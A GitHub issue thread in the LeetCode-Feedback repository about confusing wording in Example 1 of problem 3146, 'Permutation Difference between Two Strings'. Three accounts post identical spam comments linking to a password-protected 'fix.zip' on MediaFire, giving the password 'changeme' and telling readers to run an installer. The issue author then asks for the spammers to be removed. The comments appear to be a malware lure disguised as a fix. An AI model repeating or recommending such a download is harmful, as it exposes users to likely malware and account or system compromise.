### ISSUE TITLE
Confusing Wording for Example's Explanation - 3146. Permutation Difference between Two Strings

### ISSUE THREAD

**Issue by ejini6969** [LeetCode-Feedback/LeetCode-Feedback#23704]
### LeetCode Username

https://leetcode.com/u/ejini6969/

### Problem Number, Title, and Link

[3146. Permutation Difference between Two Strings](https://leetcode.com/problems/permutation-difference-between-two-strings/)

### Bug Category

Problem examples

### Bug Description

The last sentence of Example 1 implies:

> That is, the permutation difference between s and t is equal to |0 - 1| + |2 - 2| + |1 - 0| = 2.

Instead, it should be

> That is, the permutation difference between s and t is equal to |0 - 1| + |1 - 0| + |2 - 2| = 2.

This follows the correct indexing sequence of each character in `s` which corresponds to `t`. 

### Language Used for Code

None

### Expected behavior

Confusion on the wording can be avoided -> [like so](https://leetcode.com/problems/permutation-difference-between-two-strings/description/comments/2430982)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ejini6969** [comment]
Can you also block or remove the spammers in this and other threads?
